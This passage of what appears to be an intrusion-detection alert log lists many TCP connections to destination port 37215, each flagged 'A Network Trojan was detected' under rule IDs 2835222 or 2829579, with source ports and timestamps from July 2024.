                  Source Port:51280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.832032
                  SID:2835222
                  Source Port:33850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.155297
                  SID:2835222
                  Source Port:40850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161907
                  SID:2829579
                  Source Port:38856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.821696
                  SID:2835222
                  Source Port:58432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271475
                  SID:2835222
                  Source Port:38272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.350291
                  SID:2829579
                  Source Port:57508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:45206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259693
                  SID:2835222
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882577
                  SID:2835222
                  Source Port:36426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.583277
                  SID:2835222
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.882583
                  SID:2835222
                  Source Port:55124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.163403
                  SID:2829579
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.602789
                  SID:2829579
                  Source Port:58552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.035788
                  SID:2835222
                  Source Port:48186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.380620
                  SID:2829579
                  Source Port:43772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.151006
                  SID:2835222
                  Source Port:48802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771211
                  SID:2829579
                  Source Port:37530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.025929
                  SID:2829579
                  Source Port:39030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157355
                  SID:2829579
                  Source Port:37248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854683
                  SID:2829579
                  Source Port:56700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.869389
                  SID:2829579
                  Source Port:51098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915604
                  SID:2829579
                  Source Port:45814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.037647
                  SID:2829579
                  Source Port:57182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.625044
                  SID:2835222
                  Source Port:47444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.510075
                  SID:2835222
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.435588
                  SID:2829579
                  Source Port:38920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2835222
                  Source Port:53378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.369848
                  SID:2835222
                  Source Port:34708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348136
                  SID:2829579
                  Source Port:40576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.085026
                  SID:2829579
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.900850
                  SID:2835222
                  Source Port:56398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.863444
                  SID:2835222
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.609298
                  SID:2835222
                  Source Port:45812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583473
                  SID:2829579
                  Source Port:41666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2835222
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255405
                  SID:2835222
                  Source Port:49018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2829579
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.521330
                  SID:2829579
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.483673
                  SID:2829579
                  Source Port:41054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.580487
                  SID:2829579
                  Source Port:51482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.865437
                  SID:2835222
                  Source Port:43420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2835222
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597424
                  SID:2835222
                  Source Port:56954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.550470
                  SID:2829579
                  Source Port:47448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.562069
                  SID:2829579
                  Source Port:56742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:43016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.949660
                  SID:2835222
                  Source Port:60252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.813714
                  SID:2829579
                  Source Port:35078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.819070
                  SID:2829579
                  Source Port:35966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.791057
                  SID:2829579
                  Source Port:48406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2829579
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.891861
                  SID:2829579
                  Source Port:50318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.914587
                  SID:2829579
                  Source Port:32976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798485
                  SID:2835222
                  Source Port:49576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2835222
                  Source Port:33040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.466887
                  SID:2829579
                  Source Port:49594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.841622
                  SID:2835222
                  Source Port:38860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828037
                  SID:2829579
                  Source Port:38150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.837890
                  SID:2829579
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.336235
                  SID:2835222
                  Source Port:51516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.527286
                  SID:2829579
                  Source Port:35658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:35196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2829579
                  Source Port:44860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.279611
                  SID:2829579
                  Source Port:38310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011354
                  SID:2835222
                  Source Port:55074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2835222
                  Source Port:34280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489272
                  SID:2829579
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876931
                  SID:2835222
                  Source Port:36418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.849597
                  SID:2835222
                  Source Port:36818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.801856
                  SID:2835222
                  Source Port:42344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.190112
                  SID:2829579
                  Source Port:42190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702659
                  SID:2835222
                  Source Port:40560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2829579
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2829579
                  Source Port:40722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.244289
                  SID:2835222
                  Source Port:45482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565091
                  SID:2829579
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998710
                  SID:2835222
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2835222
                  Source Port:50464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525521
                  SID:2835222
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.923569
                  SID:2829579
                  Source Port:44430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781247
                  SID:2835222
                  Source Port:40004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.214237
                  SID:2835222
                  Source Port:60114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.683059
                  SID:2829579
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2835222
                  Source Port:50474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366106
                  SID:2835222
                  Source Port:50456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2829579
                  Source Port:59316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290151
                  SID:2829579
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2835222
                  Source Port:59640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.496720
                  SID:2829579
                  Source Port:45934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164451
                  SID:2835222
                  Source Port:46608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034807
                  SID:2829579
                  Source Port:42672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.576440
                  SID:2829579
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.816835
                  SID:2829579
                  Source Port:48126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.896457
                  SID:2829579
                  Source Port:48748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043481
                  SID:2829579
                  Source Port:33464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2829579
                  Source Port:51386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.902594
                  SID:2835222
                  Source Port:57164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2835222
                  Source Port:40556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489680
                  SID:2829579
                  Source Port:44300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.948431
                  SID:2829579
                  Source Port:49210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2835222
                  Source Port:48098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2835222
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523012
                  SID:2829579
                  Source Port:48072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.003897
                  SID:2835222
                  Source Port:41560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.473474
                  SID:2835222
                  Source Port:57170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793523
                  SID:2835222
                  Source Port:41462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.785071
                  SID:2829579
                  Source Port:59282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.625504
                  SID:2829579
                  Source Port:50294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2829579
                  Source Port:34758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2829579
                  Source Port:52150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.160921
                  SID:2829579
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2835222
                  Source Port:38288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.207686
                  SID:2835222
                  Source Port:33040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.101557
                  SID:2829579
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.231914
                  SID:2835222
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344718
                  SID:2835222
                  Source Port:46794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.613863
                  SID:2829579
                  Source Port:37654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632991
                  SID:2835222
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.191399
                  SID:2835222
                  Source Port:56612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.963816
                  SID:2829579
                  Source Port:45424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.665710
                  SID:2829579
                  Source Port:54418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024075
                  SID:2829579
                  Source Port:58494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.831923
                  SID:2835222
                  Source Port:40352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2835222
                  Source Port:40424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.465433
                  SID:2829579
                  Source Port:53632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479456
                  SID:2835222
                  Source Port:59882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593962
                  SID:2829579
                  Source Port:33044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:51070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411505
                  SID:2829579
                  Source Port:52266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2829579
                  Source Port:37916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2835222
                  Source Port:42478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.954473
                  SID:2835222
                  Source Port:57400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812421
                  SID:2835222
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.062116
                  SID:2829579
                  Source Port:57972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994247
                  SID:2835222
                  Source Port:52248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.017294
                  SID:2829579
                  Source Port:40246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2835222
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624834
                  SID:2835222
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.714362
                  SID:2829579
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.946656
                  SID:2835222
                  Source Port:36096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.913193
                  SID:2835222
                  Source Port:51954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.588243
                  SID:2829579
                  Source Port:37442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.868570
                  SID:2835222
                  Source Port:58338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291888
                  SID:2829579
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647678
                  SID:2829579
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.974548
                  SID:2829579
                  Source Port:54402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2829579
                  Source Port:52038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2829579
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.074903
                  SID:2829579
                  Source Port:56446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2829579
                  Source Port:34268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.224405
                  SID:2829579
                  Source Port:50536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836965
                  SID:2835222
                  Source Port:36272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873809
                  SID:2829579
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.544401
                  SID:2835222
                  Source Port:51204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.611228
                  SID:2829579
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2835222
                  Source Port:40092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290878
                  SID:2829579
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:51702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.061013
                  SID:2829579
                  Source Port:42840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.669699
                  SID:2829579
                  Source Port:47920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102240
                  SID:2829579
                  Source Port:41710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443294
                  SID:2829579
                  Source Port:46628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.663185
                  SID:2835222
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.810492
                  SID:2835222
                  Source Port:56856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.935877
                  SID:2835222
                  Source Port:51596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.663044
                  SID:2829579
                  Source Port:43716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.545900
                  SID:2835222
                  Source Port:36484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600239
                  SID:2829579
                  Source Port:52732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.664786
                  SID:2829579
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2835222
                  Source Port:41480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850928
                  SID:2835222
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.874901
                  SID:2829579
                  Source Port:49304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051351
                  SID:2829579
                  Source Port:44168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2829579
                  Source Port:36760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.428657
                  SID:2829579
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2835222
                  Source Port:45444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.348992
                  SID:2835222
                  Source Port:33520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.859326
                  SID:2829579
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.924330
                  SID:2835222
                  Source Port:44698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2835222
                  Source Port:40982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.829526
                  SID:2835222
                  Source Port:40458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2835222
                  Source Port:53008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.520093
